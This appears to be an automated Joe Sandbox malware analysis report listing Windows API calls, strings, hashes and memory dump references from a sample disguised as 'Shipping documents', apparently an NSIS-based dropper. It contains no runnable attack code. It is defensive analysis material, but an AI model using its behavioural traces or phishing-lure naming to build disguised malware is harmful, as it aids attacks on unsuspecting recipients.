                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                • Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                • ShowWindow.USER32(?), ref: 00403CAE
                                                • DestroyWindow.USER32 ref: 00403CC2
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                • EnableWindow.USER32(?,?), ref: 00403F16
                                                • EnableWindow.USER32(?,?), ref: 00403F31
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                                • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 184305955-0
                                                • Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                • Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                                                APIs
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,75923420,00000000,00434000), ref: 00403933
                                                • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
                                                • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                • GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1A
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                • RegisterClassW.USER32(00428180), ref: 00403A57
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 914957316-1115850852
                                                • Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                • Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                                • GetSysColor.USER32(?), ref: 004043AA
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                • lstrlenW.KERNEL32(?), ref: 004043CB
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                • SendMessageW.USER32(00000000), ref: 0040444D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                • SetCursor.USER32(00000000), ref: 004044CC
                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                • SetCursor.USER32(00000000), ref: 004044F0
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: AB@$N$open
                                                • API String ID: 3615053054-4108209771
                                                • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                APIs
                                                • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                • wsprintfA.USER32 ref: 00405C7E
                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                • API String ID: 1265525490-3322868524
                                                • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
                                                • lstrcatW.KERNEL32(?,00427180), ref: 0040473B
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                  • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206
                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: A
                                                • API String ID: 2246997448-3554254475
                                                • Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                • Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DCE
                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
                                                • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A
                                                Strings
                                                • Error launching installer, xrefs: 00402E0A
                                                • Null, xrefs: 00402EB3
                                                • soft, xrefs: 00402EAA
                                                • Inst, xrefs: 00402EA1
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-787788815
                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                APIs
                                                • GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
                                                • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
                                                • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
                                                • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131
                                                Strings
                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-730719616
                                                • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                • GetSysColor.USER32(00000000), ref: 004041CD
                                                • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                • SetBkMode.GDI32(?,?), ref: 004041E5
                                                • GetSysColor.USER32(?), ref: 004041F8
                                                • SetBkColor.GDI32(?,?), ref: 00404208
                                                • DeleteObject.GDI32(?), ref: 00404222
                                                • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$ow5
                                                • API String ID: 0-643804378
                                                • Opcode ID: a94a041ccb4c8cb3abe6ba851e117154c085927416926865b9a704b6a5400953
                                                • Instruction ID: 0b6ad0d2fa43d56469b874f9b0e9ddc4fc4f14763c2e1486b2c8691754578f27
                                                • Opcode Fuzzy Hash: a94a041ccb4c8cb3abe6ba851e117154c085927416926865b9a704b6a5400953
                                                • Instruction Fuzzy Hash: B2917F34A00209DFEB18DF68D994BAE7BB6FF44340F708529E801EB295DB749D4ACB50
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                  • Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                • String ID: 9
                                                • API String ID: 1149667376-2366072709
                                                • Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                • Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                APIs
